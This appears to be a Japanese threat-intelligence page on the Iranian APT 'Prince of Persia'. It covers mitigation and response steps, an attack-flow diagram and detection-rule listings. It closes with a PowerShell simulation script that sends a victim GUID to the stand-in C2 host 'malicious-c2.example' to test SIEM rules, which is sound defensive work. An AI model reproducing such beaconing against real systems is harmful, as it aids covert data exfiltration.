Follow
概要
このレポートでは、イランのステートリンクAPTクラスター「ペルシャの王子」をプロファイルし、過去10年間の進展を追跡しています。特に2023年から2025年にかけて観測された活動に重点を置いています。運用者は、諜報活動と体系的なデータ窃盗を支援するために、Foudre、Tonnerre、MaxPinner、Rugissement、Deep Freezeなどの特注マルウェアファミリーに依存しています。最近のバージョンでは、ドメイン生成アルゴリズム、Telegramベースのコマンド&コントロール、暗号化されたSFXペイロードを導入し、耐性と隠蔽性を向上させています。ターゲットは、複数の地域にわたる重要インフラと反体制派に関連するネットワークを含んでいます。
調査
SafeBreachの研究者たちは、2019年以降のグループの活動を追跡し、新しいサンプルを収集し、C2アーキテクチャを文書化し、DGAロジックを分析しました。彼らは保護されたペイロードを復号化し、Telegramボットの認証情報を抽出し、バリアントの展開タイムラインを構築しました。この研究は、別個の生産およびテストのインフラストラクチャを強調し、Excel駆動の感染チェーンに関連するファイルドロップの挙動を詳細に示しています。マルウェアのハッシュ、ドメイン、URLからコンプロマイズの指標が組み立てられました。
緩和策
特定されたDGAパターンのDNSアクティビティを監視し、既知の悪意のあるドメインをブロックし、Telegramボットに関連するトラフィックを制限または検査します。参照されたマルウェアのファイル名とローダーDLLアーティファクトの検出を追加し、回転するインフラストラクチャを検出するためにDNSモニタリング/シンクホーリングを使用します。アプリケーションの許可リストを実施し、Officeセキュリティを強化してマクロを制限し、初期アクセスの可能性を減らします。
対応
いずれかの指標が見つかった場合、影響を受けたシステムを隔離し、揮発性の証拠を収集し、ドロップされたファイルと関連するレジストリパスでターゲットフォレンジックスを実行します。リンクされたすべてのドメインとIPアドレスをブロックし、漏洩したTelegramボットトークンを回転し、影響を受けたアカウントの資格情報をリセットします。カスタムローダーDLLの残骸と暗号化されたSFXペイロードを環境全体で追跡し、完全な根絶を確実にします。
graph TB %% クラス定義セクション classDef action fill:#99ccff classDef malware fill:#ffcc99 classDef tool fill:#ffe699 classDef file fill:#ccffcc classDef process fill:#ffdddd classDef operator fill:#ff9900 %% ノード定義 action_initial[“<b>アクション</b> – <b>T1566.001 スピアフィッシング添付ファイル</b><br/>被害者が悪意のある Excel ファイルを受信”] class action_initial action file_excel[“<b>ファイル</b> – マクロを含む悪意のある Excel<br/>ccupdate.tmp をドロップ”] class file_excel file malware_foudre[“<b>マルウェア</b> – Foudre (ccupdate.tmp)<br/>暗号化された SFX ペイロード”] class malware_foudre malware process_macro[“<b>プロセス</b> – マクロ実行”] class process_macro process action_execution[“<b>アクション</b> – <b>T1204.002 ユーザー実行: 悪意のあるファイル</b><br/>被害者が Excel を開く”] class action_execution action action_obfuscation[“<b>アクション</b> – <b>T1027.009 埋め込みペイロード</b><br/>ペイロードが暗号化および偽装される”] class action_obfuscation action file_camDLL[“<b>ファイル</b> – MP4 動画に偽装された DLL”] class file_camDLL file action_deobfuscate[“<b>アクション</b> – <b>T1140 難読化解除/ファイルのデコード</b><br/>ハードコードされたパスワードでペイロードを復号”] class action_deobfuscate action process_decrypt[“<b>プロセス</b> – 復号ルーチン”] class process_decrypt process action_dga[“<b>アクション</b> – <b>T1568.002 動的解決 (DGA)</b><br/>ドメイン LOS1、FTS1 を生成”] class action_dga action process_dga[“<b>プロセス</b> – ドメイン生成アルゴリズム”] class process_dga process action_webc2[“<b>アクション</b> – <b>T1102.002 Web サービスによる双方向通信</b><br/>GUID、バージョン、ユーザー情報を含む HTTP GET”] class action_webc2 action process_http[“<b>プロセス</b> – HTTP リクエスト/レスポンス”] class process_http process action_telegram[“<b>アクション</b> – C2 に Telegram ボットを使用”] class action_telegram action file_tga[“<b>ファイル</b> – tga.adr(Telegram ボットクライアント)”] class file_tga file process_telegram[“<b>プロセス</b> – ボットトークンを使用して Telegram API 経由で通信”] class process_telegram process action_exfil[“<b>アクション</b> – <b>T1041 C2 チャネル経由のデータ流出</b><br/>窃取したファイルを C2 ディレクトリにアップロード”] class action_exfil action file_exfil[“<b>ファイル</b> – エンコードされたファイル名、暗号化されたコンテンツ”] class file_exfil file action_data_obfusc[“<b>アクション</b> – <b>T1001 データ難読化</b><br/>エンコードされた名前と暗号化を用いて流出データを保存”] class action_data_obfusc action %% フローを示す接続 action_initial u002du002d>|配信| file_excel file_excel u002du002d>|ドロップ| malware_foudre malware_foudre u002du002d>|次を介して実行| process_macro process_macro u002du002d>|次につながる| action_execution action_execution u002du002d>|トリガー| action_obfuscation action_obfuscation u002du002d>|使用| file_camDLL action_obfuscation u002du002d>|次につながる| action_deobfuscate action_deobfuscate u002du002d>|実行| process_decrypt process_decrypt u002du002d>|生成| malware_foudre malware_foudre u002du002d>|開始| action_dga action_dga u002du002d>|実行| process_dga process_dga u002du002d>|解決先| action_webc2 action_webc2 u002du002d>|使用| process_http process_http u002du002d>|ダウンロード| file_tga file_tga u002du002d>|有効化| action_telegram action_telegram u002du002d>|使用| process_telegram process_telegram u002du002d>|次を介して流出| action_exfil action_exfil u002du002d>|保存形式| file_exfil file_exfil u002du002d>|適用| action_data_obfusc
アタックフロー
検出
コマンド&コントロールチャンネルとしての可能性のあるTelegramの悪用(dns_query経由)
表示
第三者サービス/ツール経由での可能性のあるデータの流入/流出/C2(プロキシ経由)
表示
通常でないトップレベルドメイン(TLD)DNS要求による不審なコマンド&コントロール(dns経由)
表示
不審なTaskkillの実行(cmdline経由)
表示
検出するためのIOC(HashSha256):2025年12月18日 ペルシャのプリンス:イラン国家APTキャンペーン活動の10年間の顕微鏡での調査 パート2
表示
検出するためのIOC(SourceIP):2025年12月18日 ペルシャのプリンス:イラン国家APTキャンペーン活動の10年間の顕微鏡での調査
表示
検出するためのIOC(HashSha256):2025年12月18日 ペルシャのプリンス:イラン国家APTキャンペーン活動の10年間の顕微鏡での調査 パート1
表示
検出するためのIOC(HashMd5):2025年12月18日 ペルシャのプリンス:イラン国家APTキャンペーン活動の10年間の顕微鏡での調査
表示
検出するためのIOC(DestinationIP):2025年12月18日 ペルシャのプリンス:イラン国家APTキャンペーン活動の10年間の顕微鏡での調査
表示
Excelファイルに埋め込まれた実行可能ファイルによるFoudre v34感染の検出 [Windows プロセス生成]
表示
FoudreとTonnerre C2通信の検出 [Windows ネットワーク接続]
表示
シミュレーション実行
前提条件:テレメトリとベースラインの事前飛行チェックは合格している必要があります。
根拠:このセクションでは、検出ルールをトリガーするために設計された敵の手法(T1584.005)の正確な実行を詳細に説明します。コマンドとナラティブは、特定されたTTPに直接反映され、検出ロジックによって期待される正確なテレメトリを生成することを目的としています。
-
攻撃の物語とコマンド:
脅威インテリジェンスは悪意のあるドメインを設定しましたmalicious-c2.exampleこれは、Foudre/Tonnerre C2サーバーをホストしています。アタッカーのペイロードは、被害者のマシン上で2つのHTTP GETリクエストを実行します:- 被害者のGUIDをFoudre C2エンドポイントに送信し、パスを使用します
/1/?c=<GUID>. - Tonnerreバックドアを介してTelegramのAPIにアクセスし、パスを使用します
/t/tga.adr.
両方のリクエストはHTTP経由で行われ(プロキシログを簡素化するため)、一般的なユーザーエージェントを含んで通常のトラフィックと混ざるようにします。これらのアクションは、Sigmaルールが監視する正確なフィールド(
request_method=GET,urlを含むターゲットとするサブストリング)を生成します。 - 被害者のGUIDをFoudre C2エンドポイントに送信し、パスを使用します
-
回帰テストスクリプト:
# ------------------------------------------------------------ # Foudre & Tonnerre C2通信シミュレーション(Windows) # ------------------------------------------------------------ # 1. 被害者のGUIDを定義します(実際の感染であれば、レジストリから読み取られます) $guid = (New-Guid).Guid # 2. 悪意のあるC2ホストを定義します(テスト用にあなたの管理するアドレスに置き換えてください) $c2Host = "http://malicious-c2.example" # 3. GUIDをFoudre C2エンドポイントに送信します $foudreUrl = "$c2Host/1/?c=$guid" Write-Host "[*] GUIDをFoudre C2に送信中: $foudreUrl" Invoke-WebRequest -Uri $foudreUrl -Method GET -UseBasicParsing # 4. Tonnerreバックドアを介してTelegram APIにアクセスします $telegramUrl = "$c2Host/t/tga.adr" Write-Host "[*] Telegram APIエンドポイントにアクセス中: $telegramUrl" Invoke-WebRequest -Uri $telegramUrl -Method GET -UseBasicParsing Write-Host "[+] シミュレーション完了。SIEMでアラートを確認してください。"スクリプトは自己完結しています。プロキシを経由してトラフィックをルーティングするWindowsホスト上で実行すると、Sigmaルールの
url|contains条件に一致する2つのログエントリが生成されます。 -
クリーンアップコマンド:
# 一時的なネットワーク接続を削除します(プロキシが持続的なセッションを作成する場合にのみ関連) # ここでは、悪意のあるホストの解決の残存を避けるためにDNSキャッシュを単にクリアします。 ipconfig /flushdns Write-Host "[*] クリーンアップ完了。"